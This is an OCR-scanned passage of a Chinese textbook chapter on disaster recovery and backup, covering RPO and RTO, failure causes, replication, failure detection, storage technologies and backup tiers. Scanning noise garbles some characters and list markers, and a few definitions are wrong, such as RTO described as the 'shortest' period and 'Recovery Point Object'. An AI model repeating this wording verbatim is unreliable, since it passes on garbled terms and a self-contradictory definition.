有 许多 举 不 胜 举 且 触目 惊 心 的 例子 ,每 一 次 都 是 惨痛 的 教训 。 由 此 可 见 ,尽管 小 心 谨慎 ,还 
是 不 可 避免 地 会 发 生 各 种 各 样 的 灾难 。 

1. 容 灾 的 定义 

容 灾 是 一 个 范畴 很 广泛 的 概念 ,是 一 个 系统 工程 ,包括 支持 用 户 业 务 的 方方面面 ,可 以 
将 所 有 与 业务 连续 性 相关 的 内 容 都 纳入 容 灾 中 。 对 于 IT 而 言 , 容 灾 提 供 一 个 能 防止 用 户 
业务 系统 遭受 各 种 灾难 破坏 的 计算 机 系统 。 容 灾 主 要 表现 为 一 种 未 雨 绸 缪 的 主动 性 ,而 不 
是 在 灾难 发 生 后 的 亡羊补牢 。 

容 灾 是 指 在 发 生 灾难 性 事故 时 ,能够 利用 已 备份 的 数据 或 其 他 手段 ,及 时 对 原 系统 进行 


恢复 ,以 保证 数据 的 安全 性 以 及 业务 的 连续 性 。 

从 技术 上 看 ,衡量 容 灾 系 统 有 两 个 主要 指标 : RPO 和 RTO. 

RPO( Recovery Point Object): 即 数据 恢复 点 目标 ,主要 是 指 当 灾难 发 生 时 业务 系统 所 
能 容忍 的 数据 丢失 量 。 

RTO( Recovery Time Object): 即 数据 恢复 时 间 目 标 ,主要 是 指 所 能 容忍 的 业务 停止 服 
务 的 最 长 时 间 , 即 从 灾难 发 生 到 业务 系统 恢复 服务 功能 所 需要 的 最 短 时 间 周 期 。 

RPO 针对 的 是 数据 丢失 ,而 RTO 针对 的 是 服务 丢失 ,二 者 没有 必然 的 关联 性 。RTO 
和 RPO 的 确定 必须 在 进行 风险 分 析 和 业务 影响 分 析 后 ,根据 不 同 的 业务 需求 确定 。 对 于 不 
同 企业 的 同一 种 业务 .RTO 和 RPO 的 需求 也 会 有 所 不 同 。RPO 与 RTO 越 小 ,系统 的 可 用 
性 就 越 高 ,当然 需要 的 投资 也 越 大 。 

2. 导致 系统 灾难 原因 

从 广义 上 讲 , 对 于 一 个 计算 机 系统 而 言 ,一切 引起 系统 非 正 常 停机 的 事件 都 称 为 灾难 。 
威胁 数据 的 安全 ,造成 系统 失效 的 主要 原因 有 以 下 几 个 方面 。 

CD 硬件 故障 。 主 要 的 硬件 故障 包括 L/O 和 硬盘 损坏 、. 电 源 ( 包 括 电 缆 、 插 座 ) 以 及 网 络 
故障 等 ,如 果 是 安装 系统 的 磁盘 故障 , 则 还 必须 重建 系统 。 

(2) 人 为 错误 。 最 容易 忽略 的 故障 原因 ,包括 误 操作 、 人 为 蓄意 破坏 ,如 对 一 些 关键 系 
统 配 置 文件 的 不 当 操 作 , 或 者 人 为 删除 一 个 文件 或 格式 化 一 个 磁盘 ,会 导致 系统 不 能 正常 启 
动 。 另 外 还 有 黑客 的 攻击 ,黑客 侵入 计算 机 系统 ,并 且 破 坏 计算 机 系统 。 

(3) 软件 故障 。 最 为 复杂 和 多 样 化 的 故障 原因 ,如 系统 参数 设置 不 当 或 者 由 于 应 用 程 
序 没 有 优化 ,造成 运行 时 系统 资源 不 合理 分 配 或 数据 库 参 数 设置 不 当 等 ,都 有 可 能 导致 系统 
性 能 下 降 , 甚 至 停机 。 

(4) 病毒 影响 。 病 毒 使 计算 机 系统 感染 ,损坏 计算 机 数据 ,需要 及 早 预防 病毒 的 攻击 。 

CO 自然 灾难 。 包 括 地 震 、 台 风水 灾 、 雷 电 、 火 灾 等 会 无 情 地 毁灭 计算 机 系统 ,这 种 灾 
难 破坏 性 很 大 ,影响 面 比较 广 。 

灾难 发 生 后 ,恢复 的 一 般 步 又 如 下 。 

第 1 步 : 恢复 硬件 。 

第 2 步 : 重新 装 入 操作 系统 。 

第 3 步 : 设置 操作 系统 (驱动 程序 设置 、 系 统 、 用 户 设置 )。 

SB Ab. 重新 装 入 应 用 程序 ,进行 系统 设置 。 

第 5 步 : 用 最 新 的 备份 恢复 系统 数据 。 

3. 容 灾 的 级 别 

容 灾 可 以 分 为 3 个 级 别 : 数据 级 、 应 用 级 和 业务 级 。 

(1) 数据 级 容 灾 

数据 级 容 灾 关 注 点 在 于 数据 .需要 确保 用 户 数据 的 完整 性 、 可 靠 性 ,安全 性 和 一 致 性 , 即 
灾难 发 生 后 可 以 确保 用 户 原 有 的 数据 不 会 丢失 或 者 遭 到 破坏 。 数 据 级 容 灾 较 为 基础 ,其 中 ， 
较 低级 别 的 数据 容 灾 方 案 仅 需 利用 磁带 库 和 管理 软件 就 能 实现 数据 异地 备份 ,达到 容 灾 的 
功效 ; 而 较 高 级 的 数据 容 灾 方案 则 是 依靠 数据 复制 工具 ,例如 卷 复制 软件 ,或 者 存储 系统 的 
硬件 控制 器 ,实现 数据 的 远程 复制 。 

数据 级 容 灾 是 保障 数据 可 用 的 最 后 底线 , 当 数 据 丢 失 时 能 够 保证 应 用 系统 可 以 重新 得 
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到 所 有 数据 。 从 这 种 意义 上 讲 , 数 据 备 份 属于 该 级 别 容 灾 ,用 户 把 重要 的 数据 存放 在 磁带 
上 ,如 果 考 虑 到 高 级 别 的 安全 性 还 可 以 把 磁带 运送 到 远 距 离 的 地 方 保存 , 当 灾 难 发 生 后 ,从 
磁带 中 获取 数据 。 该 级 别 灾难 恢复 时 间 较 长 ,仍然 存在 风险 ,尽管 用 户 原 有 数据 没有 丢失 ， 
但 是 对 于 提供 实时 服务 的 信息 系统 ,应 用 会 被 中 断 ,用 户 业 务 也 被 迫 停止 。 

(2) 应 用 级 容 灾 

应 用 级 容 灾 在 数据 级 容 灾 的 基础 上 ,把 执行 应 用 处 理 能 力 复制 一 份 , 即 在 备份 站 点 同样 
构建 一 套 应 用 系统 ,在 保证 用 户 数 据 的 完整 性 、 可 靠 性 、 安 全 性 和 一 致 性 的 前 提 下 ,提供 不 间 
断 的 应 用 服务 ,让 客户 的 应 用 服务 请 求 能 够 透明 地 继续 运行 ,而 感受 不 到 灾难 的 发 生 , 保 证 
整个 信息 系统 提供 的 服务 完整 .可 靠 、 安 全 和 一 致 。 一 般 来 说 ,应 用 级 容 灾 系统 需要 通过 更 
多 软件 来 实现 , 它 可 以 使 企业 的 多 种 应 用 在 灾难 发 生 时 进行 快速 切换 ,确保 业务 的 连续 性 。 
应 用 级 容 灾 比 数据 级 容 灾 要 求 更 高 。 

(3) 业务 级 容 灾 

数据 级 容 灾 和 应 用 级 容 灾 都 是 在 IT 范畴 之 内 ,然而 对 于 正常 业务 而 言 , 仅 IT 系统 的 
保障 还 是 不 够 的 。 有 些 用 户 需 要 构建 最 高 级 别 的 业务 级 别 容 灾 。 

业务 级 容 灾 的 大 部 分 内 容 是 非 IT 系统 ,比如 电话 、 办 公 地 点 等 。 当 一 场 大 的 灾难 发 生 
时 ,用 户 原 有 的 办 公 场 所 都 会 受到 破坏 ,用 户 除 了 需要 原 有 的 数据 、 原 有 的 应 用 系统 ,更 需要 
工作 人 员 在 一 个 备份 的 工作 场所 能 够 正常 地 开展 业务 。 

4. 容 灾 系统 

由 于 容 灾 所 承担 的 是 用 户 最 关键 的 核心 业务 ,其 发 挥 的 作用 异常 重要 , 容 灾 本 身 的 复杂 
性 也 是 十 分 明显 ,这 些 决定 了 容 灾 是 一 项 系统 工程 。 

容 灾 首 先 涉及 众多 技术 及 众多 厂商 的 各 类 解决 方案 。 性 能 、 灵 活性 及 价格 都 是 必须 考 
虑 的 因素 ,更 重要 的 是 ,用 户 需要 根据 自己 的 实际 需求 量 身 打造 。 许 多 用 户 的 生产 站 点 都 是 
经 过 长 期 积累 、 多 次 改造 后 形成 的 ,对 于 特殊 的 应 用 还 采用 特定 的 设备 。 那 么 当 用 户 考虑 构 
建 容 灾 站 点 时 就 必须 把 所 有 的 情况 都 考虑 进来 .构建 容 灾 方案 的 一 条 基本 准则 是 “选择 适合 
自己 的 ”。 与 此 同时 用 户 还 要 考虑 长 远 一 些 , 尽 量 采 用 先进 而 不 是 将 要 淘汰 的 技术 ,毕竟 宛 
余 站 点 与 生产 站 点 一 样 会 长 期 使 用 。 

一 个 完整 的 容 灾 系 统 应 该 包含 3 个 部 分 : 本 地 容 灾 、 异 地 容 灾 和 有 效 的 管理 机 制 。 


CD 本 地 容 灾 

主要 手段 是 容错 ,容错 的 基本 思想 是 在 系统 体系 结构 上 精心 设计 ,利用 外 加 资源 的 元 余 
技术 来 达到 屏蔽 故障 ,自动 恢复 系统 或 安全 停机 的 目的 。 

(2) 异地 容 灾 


当 遇 到 自然 灾害 (火山 、 地 震 ) 或 者 战争 等 意外 事件 时 , 仅 采 用 本 地 容 灾 并 不 能 满足 要 
求 ,这 就 应 该 考虑 采用 异地 容 灾 的 保护 措施 。 异 地 容 灾 是 指 在 相隔 较 远 的 异地 ,建立 两 套 或 
多 套 功 能 相同 的 IT 系统 ,当主 系统 因 意外 停止 工作 时 ,备用 系统 可 以 接替 工作 ,保证 系统 
的 不 间断 运行 。 异 地 容 灾 系 统 采用 的 主要 方法 是 数据 复制 ,目的 是 在 本 地 与 异地 之 间 确 保 
各 系统 关键 数据 和 状态 参数 的 一 致 。 

(3) 有 效 的 管理 机 制 

(OR. 
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5. 容 灾 系统 的 关键 技术 

对 于 容 灾 系 统 来 说 ,所 包含 的 关键 技术 有 数据 存储 管理 .数据 复制 .灾难 检测 、 系 统 迁 移 
和 灾难 恢复 5 个 方面 。 

CD 数据 存储 管理 

数据 存储 管理 是 指 对 与 计算 机 系统 数据 存储 相关 的 一 系列 操作 (如 备份 .归档 ,恢复 等 ) 
进行 的 统一 管理 ,是 计算 机 系统 管理 的 一 个 重要 组 成 部 分 ,也 是 建立 一 个 容 灾 系统 的 重要 组 
成 部 分 。 

数据 备份 ,是 指 为 防止 系统 出 现 操作 失误 或 系统 故障 导致 数据 丢失 ,而 将 全 系统 或 部 分 
数据 集合 从 应 用 主机 的 硬盘 或 阵列 复制 到 其 他 的 存储 介质 的 过 程 , 数 据 备份 是 容 灾 的 基石 。 

数据 归档 是 将 硬盘 数据 复制 到 可 移动 媒体 上 。 与 数据 备份 不 同 的 是 ,数据 归档 在 完成 
复制 工作 后 将 原始 数据 从 硬盘 上 删除 ,释放 硬盘 空间 。 

数据 备份 是 数据 存储 管理 中 的 一 个 重要 部 分 。 数 据 备份 的 评价 标准 包括 备份 速度 MC 
复 速 度 以 及 数据 恢复 点 。 

为 了 提高 备份 的 效率 ,出 现 了 很 多 新 的 备份 技术 ,在 很 大 程度 上 提高 了 备份 速度 ,主要 
的 备份 技术 在 后 面 介 绍 。 

(2) 数据 复制 

容 灾 系 统 的 核心 技术 是 数据 复制 。 顾 名 思 义 ,数据 复制 就 是 将 一 个 地 点 的 数据 复制 到 
另外 一 个 不 同 的 物理 点 上 的 过 程 。 

数据 复制 一 般 分 为 同步 数据 复制 和 异步 数据 复制 。 

根据 复制 数据 的 层次 进行 细 化 ,可 以 分 为 以 下 4 种 类 型 。 

C 硬件 级 的 数据 复制 : 主要 是 在 磁盘 级 别 对 数据 进行 复制 ,包括 磁盘 镜像 、 卷 复制 等 ， 
这 种 类 型 的 复制 方法 可 以 独立 于 应 用 ,并 且 复 制 速度 也 较 快 ,对 生产 系统 的 性 能 影响 也 较 
小 ,但 是 开销 比较 大 。 

© 操作 系统 级 的 复制 : 主要 是 在 操作 系统 层次 ,对 各 种 文件 的 复制 ,这 种 类 型 的 复制 
受到 了 具体 操作 系统 的 限制 。 

© 数据 库 级 的 复制 : 是 在 数据 库 级 别 将 对 数据 库 的 更 新 操作 以 及 其 他 事务 操作 以 消 
息 的 形式 复制 到 异地 数据 库 , 这 种 复制 方式 的 系统 开销 也 很 大 ,并 且 与 具体 数据 库 相 关 。 

D 业务 数据 流 级 复制 : 就 是 业务 数据 流 的 复制 ,就 是 将 业务 数据 流 复制 到 异地 备用 系 
统 , 经 过 系统 处 理 后 ,产生 对 异地 系统 的 更 新 操作 ,从 而 达到 同步 。 这 种 方式 也 可 以 独立 于 
具体 应 用 ,但 是 可 控 性 较 差 。 现 在 利用 这 种 方式 来 实现 容 灾 系统 的 例子 还 很 少 。 


(3) 灾难 检测 
现在 对 灾难 的 发 现 方法 一 般 是 通过 心跳 技术 和 检查 点 技术 ,这 种 技术 在 高 可 靠 性 集群 
中 应 用 很 广泛 。 


心跳 技术 又 称 为 拉 技术 ,就 是 每 隔 一 段 时 间 都 要 向 外 广播 自身 的 状态 (通常 为 “存活 ” 状 
态 ) ,在 进行 心跳 检测 时 ,心跳 检测 的 时 间 和 时 间 间 隔 是 关键 问题 ,如 果 心 跳 检 测 的 太 频 繁 ， 
将 会 影响 系统 的 正常 运行 ,占用 系统 资源 ; 如 果 间 隔 时 间 太 长 ., 则 检测 就 比较 迟钝 ,影响 检 
测 的 及 时 性 。 

检查 点 技术 又 称 为 主动 检测 ,就 是 每 隔 一 段 时 间 ,就 会 对 被 检测 对 象 进行 一 次 检测 ,如 
果 在 给 定 的 时 间 内 被 检测 对 象 没有 相应 , 则 认为 检测 对 象 失效 。 与 心跳 技术 相同 ,检查 点 技 
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术 也 受到 检测 周期 的 影响 ,如 果 检 测 周期 太 短 ,虽然 能 够 及 时 发 现 故障 ,但 是 给 系统 造成 很 
大 的 开销 ; 如 果 检 测 周期 太 长 , 则 无 法 及 时 地 发 现 故 障 。 

对 于 异地 容 灾 ,备份 生产 中 心 和 主 生 产 中 心 可 能 相隔 千里 ,这 时 候 因 为 网 络 延 迟 较 大 或 
者 其 他 原因 ,可 能 会 影响 心跳 检测 的 效果 ,因此 如 何 对 现 有 的 检测 技术 进行 改进 ,以 适应 广 
域 网 的 要 求 , 将 是 实现 高 效 的 远程 容 灾 系统 的 基础 。 

(4) 系统 迁移 

在 发 生 灾难 时 ,为 了 能 够 保证 业务 的 连续 性 ,必须 实现 能 够 实现 系统 透明 的 迁移 ,也 就 
是 能 够 利用 备用 系统 透明 的 代替 生产 系统 ,一 般 是 通过 DNS 或 者 IP 地 址 的 改变 来 实现 系 
统 迁移 的 。 

(5) 灾难 恢复 

灾难 恢复 是 为 恢复 计算 机 系统 提供 保证 的 。 业 界 广泛 的 经 验 和 教训 说 明 , 灾 难 恢复 的 
成 功 在 于 企业 中 经 过 良好 训练 和 预演 的 人 在 自己 的 角色 上 实施 预先 计划 的 策略 , 即 灾 难 恢 
复 计划 。 在 系统 备份 与 灾难 恢复 计划 建立 以 后 ,还 必须 在 事前 反复 测试 ,并 随时 调整 ,加 以 
改进 ,完整 的 系统 恢复 方案 才能 得 以 建立 。 其 中 灾难 恢复 策略 在 整个 恢复 方案 中 占有 非常 
重要 的 作用 。 

可 以 按照 以 下 几 个 步骤 来 制定 数据 恢复 策略 。 

CD 评估 公司 对 数据 流 和 有 效 数据 的 需要 性 。 

© 每 次 数据 损坏 事故 造成 的 经 济 损失 有 多 大 。 

© 在 多 长 时 间 范 围 内 必须 成 功 进行 数据 恢复 ,以 避免 其 影响 企业 收益 。 

CD 评估 数据 损失 的 风险 ,确定 跨 部 门 的 数据 恢复 策略 优先 级 别 。 

© 评估 数据 存储 设备 的 所 有 潜在 的 风险 。 

© 使 用 上 述评 估 结 果 制 定 质 优 价 廉 的 安全 机 制 (包括 备份 ) 。 

CD 数据 损失 的 间接 代价 是 什么 。 

@ 通过 对 所 有 的 数据 损坏 进行 预算 来 制定 预防 策略 和 最 终 的 数据 恢复 策略 。 

6. 容 灾 备份 技术 

建立 容 灾 备 份 系统 时 会 涉及 多 种 技术 ,如 SAN 技术 .DAS 技术 、NAS 技术 、 远 程 镜像 技 
术 、 虚 拟 存储 ,基于 IP f SAN 的 互联 技术 ,快照 技术 、 推 技术 、RAIT 技术 、 并 行 流 技 术 等 。 

(D SAN(Storage Area Network ,存储 局 域 网 ) 技 术 

SAN 是 独立 于 服务 器 网 络 系统 之 外 几乎 拥有 无 限 存 储 的 高 速 存储 网 络 , 它 以 光纤 通道 
作为 传输 媒体 ,以 光纤 通道 和 SCSI 的 应 用 协议 作为 存储 访问 协议 ,将 存储 子 系统 网 络 化 。 
光纤 通道 技术 具有 带宽 高 , 误 码 率 低 和 距离 长 等 特点 ,特别 适合 于 海量 数据 传输 领域 ,所 以 
被 应 用 于 主机 和 存储 器 间 的 连接 通道 和 组 网 技术 中 。 基 于 SAN 的 备份 解决 方案 既 包 括 了 
集中 式 备份 解决 方案 的 所 有 管理 上 的 优点 ,又 涵盖 了 分 布 式 ( 直 连 式 ) 备 份 方案 所 独 具 的 高 

(2) DAS(Direct Attachment Storage, 直 接 挂 接 存储 ) 技 术 

DAS 数据 存储 设备 直接 挂 接 在 各 种 服务 器 或 客户 端 扩展 接口 下 ,服务 器 通过 I/O 通 
道 服务 来 直接 访问 DAS 中 的 数据 。DAS 本 身 是 硬件 的 堆 秋 ,不 带 有 任何 存储 操作 系统 ， 
而 应 用 服务 器 本 身 的 操作 系统 与 第 三 方 应 用 软件 挂 接 , 使 得 DAS 设备 的 价格 相对 比较 
便宜 。 
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(3) NASCNetwork Attachment Storage ,网络 挂 接 存储 ) 技 术 

NAS 技术 可 以 满足 无 专用 直接 连接 存储 设备 的 主机 存储 需要 。 由 于 NAS 具有 协议 公 
开 、 操 作 简单 和 适应 范围 广 的 特点 ,特别 是 在 以 文件 处 理 为 基础 的 多 用 户 网 络 计 算 环境 中 ， 
NAS 更 以 其 良好 的 扩展 能 力 成 为 重要 的 存储 手段 。 

(4) 远程 镜像 技术 

这 种 技术 克服 了 传统 镜像 和 备份 技术 在 时 空 方 面 的 局 限 性 ,能 够 保障 关键 业务 在 大 规 
模 灾 害 或 危机 发 生 时 仍然 能 够 持续 不 断 地 稳定 运行 。 远 程 数据 镜像 技术 实现 了 数据 在 不 同 
环境 间 的 实时 有 效 复制 ,无论 这 些 环境 间 相 距 几 米 ` 几 公里 ,还 是 横 吾 大 陆 。 

远程 镜像 技术 是 在 主 数据 中 心 和 备 援 中 心 之 间 的 数据 备份 时 用 到 。 镜 像 是 在 两 个 或 多 
个 磁盘 或 磁盘 子 系统 上 产生 同一 个 数据 的 镜像 视图 的 信息 存储 过 程 , 一 个 称 为 主 镜像 系统 ， 
另 一 个 称 为 从 镜像 系统 。 按 主 、 从 镜像 存储 系统 所 处 的 位 置 可 分 为 本 地 镜像 和 远程 镜像 。 

远程 镜像 又 称 远程 复制 ,是 容 灾 备份 的 核心 技术 ,同时 也 是 保持 远程 数据 同步 和 实现 灾 
难 恢复 的 基础 。 远 程 镜像 按 请 求 镜像 的 主机 是 否 需 要 远程 镜像 站 点 的 确认 信息 ,又 可 分 为 
同步 远程 镜像 和 异步 远程 镜像 。 

同步 远程 镜像 (同步 复制 技术 ) 是 指 通 过 远程 镜像 软件 ,将 本 地 数据 以 完全 同步 的 方式 
复制 到 异地 ,每 一 本 地 的 I/O 事务 均 需 要 等 待 远程 复制 的 完成 确认 信息 , 方 子 以 释放 。 同 
步 镜像 使 远程 复制 总 能 与 本 地 机 要 求 复制 的 内 容 相 匹 配 。 当 主 站 点 出 现 故 障 时 ,用 户 的 应 
用 程序 切换 到 备份 的 替代 站 点 后 ,被 镜像 的 远程 副本 可 以 保证 业务 继续 执行 而 没有 数据 的 
丢失 。 但 它 存在 往返 传播 造成 延 时 较 长 的 缺点 ,只 限于 在 相对 较 近 的 距离 上 应 用 。 

异步 远程 镜像 (异步 复制 技术 ) 保 证 在 更 新 远程 存储 视图 前 完成 向 本 地 存储 系统 的 基本 
1/0 操作 ,而 由 本 地 存储 系统 提供 给 请 求 镜像 主机 的 L/O 操作 完成 确认 信息 。 远 程 的 数据 
复制 是 以 后 台 同 步 的 方式 进行 的 ,这 使 本 地 系统 性 能 受到 的 影响 很 小 ,传输 距离 长 (可 达 
1000km 以 上 ) ,对 网 络 带宽 要 求 小 。 但 是 ,许多 远程 的 从 属 存 储 子 系统 的 写 没 有 得 到 确认 ， 
当 某 种 因素 造成 数据 传输 失败 ,可 能 出 现 数据 一 致 性 问题 。 为 解决 这 个 问题 ,目前 大 多 采用 
延迟 复制 的 技术 , 即 在 确保 本 地 数据 完好 无 损 后 进行 远程 数据 更 新 。 

(5) 虚拟 存储 

在 有 些 容 灾 方案 产品 中 ,还 采取 了 虚拟 存储 技术 ,如 西 瑞 异 地 容 灾 方案 。 虚 拟 化 存储 技 
术 在 系统 弹性 和 可 扩展 性 上 开创 了 新 的 局 面 。 它 将 几 个 IDE 或 SCSI 驱动 器 等 不 同 的 存储 
设备 串联 为 一 个 存储 池 。 存 储 集群 的 整个 存储 容量 可 以 分 为 多 个 逻辑 卷 , 并 作为 虚拟 分 区 
进行 管理 。 存 储 由 此 成 为 一 种 功能 而 非 物理 属性 ,而 这 正 是 基于 服务 器 的 存储 结构 存在 的 
主要 限制 。 

虚拟 存储 系统 还 提供 了 动态 改变 逻辑 卷 大 小 的 功能 。 事实 上 ,存储 卷 的 容量 可 以 在 线 
随意 增加 或 减少 。 可 以 通过 在 系统 中 增加 或 减少 物理 磁盘 的 数量 来 改变 集群 中 逻辑 卷 的 大 
小 。 这 一 功能 允许 卷 的 容量 随 用 户 的 即时 要 求 动态 改变 。 另 外 ,存储 卷 能 够 很 容易 地 改变 
容量 ,移动 和 替换 。 安 装 系统 时 ,只 需 为 每 个 逻辑 卷 分 配 最 小 的 容量 ,并 在 磁盘 上 留 出 剩余 
的 空间 。 随 着 业务 的 发 展 ,可 以 用 剩余 空间 根据 需要 扩展 逻辑 卷 。 也 可 以 将 数据 在 线 从 旧 
驱动 器 转移 到 新 的 驱动 器 上 ,而 不 中 断 服务 的 运行 。 

存储 虚拟 化 的 一 个 关键 优势 是 它 允 许 异 质 系统 和 应 用 程序 共享 存储 设备 ,而 不 管 它们 
位 于 何 处 。 公 司 将 不 再 需要 在 每 个 分 部 的 服务 器 上 都 连接 一 台 磁 带 设 备 。 
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(6) 基于 IP 的 SAN 的 互联 技术 

早期 的 主 数据 中 心 和 备 援 数 据 中 心 之 间 的 数据 备份 ,主要 是 基于 SAN 的 远程 复制 ( 镜 
像 ), 即 通过 光纤 通道 FC, 把 两 个 SAN 联结 起 来 ,进行 远程 镜像 (复制 )。 当 灾难 发 生 时 ,由 
备 援 数据 中 心 替代 主 数 据 中 心 保证 系统 工作 的 连续 性 。 这 种 远程 容 灾 备份 方式 存在 一 些 缺 
陷 , 如 实现 成 本 高 .设备 的 互 操作 性 差 .跨越 的 地 理 距离 短 (10km) 等 ,这 些 因素 阻碍 了 它 的 
进一步 推广 和 应 用 。 

目前 ,出 现 了 多 种 基于 IP 的 SAN 的 远程 数据 容 灾 备份 技术 。 它 们 是 利用 基于 IP 的 
SAN 的 互联 协议 ,将 主 数据 中 心 SAN 中 的 信息 通过 现 有 的 TCP/IP 网 络 ,远程 复制 到 备 援 
中 心 SAN 中 。 当 备 援 中 心 存 储 的 数据 量 过 大 时 ,可 以 利用 快照 技术 将 其 备份 到 磁带 库 或 
光盘 库 中 。 这 种 基于 IP 的 SAN 的 远程 容 灾 备份 ,可 以 跨越 LAN、MAN 和 WAN, 成 本 低 、 
可 扩展 性 好 ,具有 广阔 的 发 展 前 景 。 

(7) 快照 技术 

远程 镜像 技术 往往 同 快照 技术 结合 起 来 实现 远程 备份 , 即 通过 镜像 把 数据 备份 到 远程 
存储 系统 中 ,再 用 快照 技术 把 远程 存储 系统 中 的 信息 备份 到 远程 的 磁带 库 .光盘 库 中 。 

快照 是 通过 软件 对 要 备份 的 磁盘 子 系统 的 数据 快速 扫描 ,建立 一 个 要 备份 数据 的 快照 
逻辑 单元 号 LUN 和 快照 缓存 ,在 快速 扫描 时 ,把 备份 过 程 中 即将 要 修改 的 数据 块 同时 快速 
复制 到 快照 缓存 中 。 快 照 LUN 是 一 组 指针 , 它 指向 快照 缓存 和 磁盘 子 系统 中 不 变 的 数据 
块 (在 备份 过 程 中 )。 在 正常 业务 进行 的 同时 ,利用 快照 LUN 实现 对 原 数据 的 一 个 完全 的 
备份 。 它 可 使 用 户 在 正常 业务 不 受 影响 的 情况 下 ,实时 提取 当前 在 线 业 务 数据 。 其 “备份 窗 
口 ”接近 于 零 , 可 大 大 增加 系统 业务 的 连续 性 ,为 实现 系统 真正 的 7X24 小 时 运转 提供 了 保 
证 。 快 照 是 通过 内 存 作为 缓冲 区 (快照 缓存 ) ,由 快照 软件 提供 系统 磁盘 存储 的 即时 数据 映 
1$ , 它 存 在 缓冲 区 调度 的 问题 。 

(8) 推 技术 

推 技术 是 一 种 代理 程序 , 它 安装 在 需要 备份 的 客户 机 上 ,按照 备份 服务 器 的 要 求 ,代理 
程序 产生 需要 备份 文件 的 列表 ,将 这 些 文件 进行 打包 压缩 , 送 到 备份 服务 器 上 。 它 代理 了 一 
部 分 备份 服务 器 的 工作 ,提高 了 网 络 备份 的 效率 。 

(9) RAIT(Redundant Array of Inexpensive Tape) 技 术 

RAIT 是 将 多 个 相同 的 磁带 驱动 器 做 成 一 个 阵列 , 既 可 以 提高 备份 性 能 ,又 可 以 提高 磁 
带 的 容错 性 。 

(10) 并 行 流 技术 

并 行 流 技 术 指 在 同一 个 备份 服务 器 上 连接 了 多 个 备份 设备 ,同时 也 提交 多 个 备份 任务 ， 
它们 分 别针 对 不 同 的 磁带 设备 。 这 样 可 以 达到 并 行 操作 。 但 它 不 像 RAIT 技术 那样 具备 容 
错 的 功能 。 

下 面 是 对 个 人 用 户 提出 的 一 些 备 份 建议 。 

(1) 操作 系统 与 应 用 软件 备份 

在 安装 完 操作 系统 与 应 用 软件 后 ,将 操作 系统 所 在 的 分 区 映射 为 一 个 镜像 文件 (使 用 
ghost) ,保存 在 另 一 块 硬盘 或 另 一 个 逻辑 分 区 上 ,这样 在 数据 恢复 时 就 可 以 直接 由 镜像 文件 
恢复 操作 系统 。 

如 果 应 用 软件 没有 安装 在 系统 盘 (C:) 的 Program Files 文件 夹 下 ,而 是 安装 在 了 其 他 
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分 区 (D:) 上 ,那么 在 备份 C 盘 后 也 要 备份 D dit ,这样 操作 系统 发 生 数 据 故障 后 ,就 会 很 快 恢 
复 系统 ,而 不 用 重新 安装 操作 系统 与 所 有 的 软件 。 


(2) 文档 备份 
例如 ,对 于 Office 文档 (包括 Word、PowerPoint、Excel 文档 等 ) 需 要 经 常 整理 ,然后 定 
期 备份 。 


(3) 邮件 与 地 址 簿 备份 

Outlook( 或 Foxmail) 里 的 邮件 与 地 址 簿 可 以 通过 其 “导出 "工具 来 把 地 址 信息 导出 和 
邮件 导出 ,将 导出 的 信息 复制 到 其 他 存储 介质 上 可 以 完成 备份 。 

7. 容 灾 备份 等 级 

设计 一 个 容 灾 备份 系统 需要 考虑 多 个 因素 : 备份 /恢复 数据 量 大 小 .应 用 数据 中 心 与 备 
援 数据 中 心 之 间 的 距离 和 数据 传输 方式 、 灾 难 发 生 时 所 要 求 的 恢复 速度 、 备 援 中心 的 管理 及 
投入 资金 等 。 根 据 这 些 因 素 和 不 同 的 应 用 场合 ,将 容 灾 备 份 划分 为 4 个 等 级 , 见 表 8-1。 

表 8-1 容 灾 备份 等 级 
等 级 说 明 

本 地 备份 .本 地 保存 的 冷 备份 。 它 的 容 灾 恢 复 能 力 最 弱 , 它 只 在 本 地 进行 数据 备份 ,并 且 被 
备份 的 数据 磁带 只 在 本 地 保存 ,没有 送 往 异地 
本 地 备份 .异地 保存 的 冷 备份 。 在 本 地 将 关键 数据 备份 ,然后 送 到 异地 保存 ,如 交 由 银行 保 
1 级 管 。 灾 难 发 生 后 , 按 预 定数 据 恢复 程序 恢复 系统 和 数据 。 这 种 容 灾 方 案 也 是 采用 磁带 机 等 
存储 设备 进行 本 地 备份 ,同样 还 可 以 选择 磁带 库 .光盘 库 等 存储 设备 
热 备份 站 点 备份 。 在 异地 建立 一 个 热 备份 站 点 ,通过 网 络 进行 数据 备份 。 也 就 是 通过 网 络 
2 级 以 同步 或 异步 方式 ,把 主 站 点 的 数据 备份 到 备份 站 点 。 备 份 站 点 一 般 只 备份 数据 ,不 承担 业 
务 。 但 是 , 当 出 现 灾难 时 ,备份 站 点 接替 主 站 点 的 业务 ,从 而 维护 业务 运行 的 连续 性 
活动 互 援 备份 。 这 种 异地 容 灾 方 案 与 前 面 介绍 的 热 备份 站 点 备份 方案 差不多 ,不 同 的 只 是 
主 、 从 系统 不 再 是 固定 的 ,而 是 互 为 对 方 的 备份 系统 。 这 两 个 数据 中 心 系统 分 别 在 相隔 较 远 
的 地 方 建立 ,它们 都 处 于 工作 状态 ,并 进行 相互 数据 备份 。 当 某 个 数据 中 心 发 生 灾难 时 , 另 
一 个 数据 中 心 接替 其 工作 任务 。 通 常 在 这 两 个 系统 之 间 的 光纤 设备 连接 中 还 提供 元 余 通 
道 ,以 备 工 作 通道 出 现 故障 时 及 时 接替 工作 ,这 种 级 别 的 备份 根据 实际 要 求 和 投入 资金 的 多 
少 ,又 可 分 为 两 种 : 四 两 个 数据 中 心 之 间 只 限于 关键 数据 的 相互 备份 ; @ 两 个 数据 中 心 之 间 
互 为 镜像 , 即 零 数据 丢失 , 零 数 据 丢 失 是 目前 要 求 最 高 的 一 种 容 灾 备份 方式 , 它 要 求 不 管 发 
生 什 么 灾难 ,系统 都 能 保证 数据 的 安全 。 所 以 , 它 需 要 配置 复杂 的 管理 软件 和 专用 的 硬件 设 
备 ,需要 的 投资 是 最 大 的 ,但 恢复 速度 也 是 最 快 的 。 当 然 采 取 这 种 容 灾 方式 的 主要 是 资金 实 
力 较 雄 厚 的 大 型 企业 和 电信 级 企业 


0 级 


3 级 


R 8-1 中 的 容 灾 备 份 等 级 的 划分 类 似 于 国际 标准 SHARE 78.1992 年 美国 的 SHARE 
用 户 组 与 IBM 一 起 定义 了 SHARE 78 标准 ,该 标准 将 容 灾 系统 分 为 7 层 ,分 别 适用 于 不 同 
的 规模 和 应 用 场合 。 有 兴趣 的 读者 可 以 在 网 上 查找 SHARE 78 标准 的 文档 。 

8. 数据 容 灾 与 备份 的 联系 

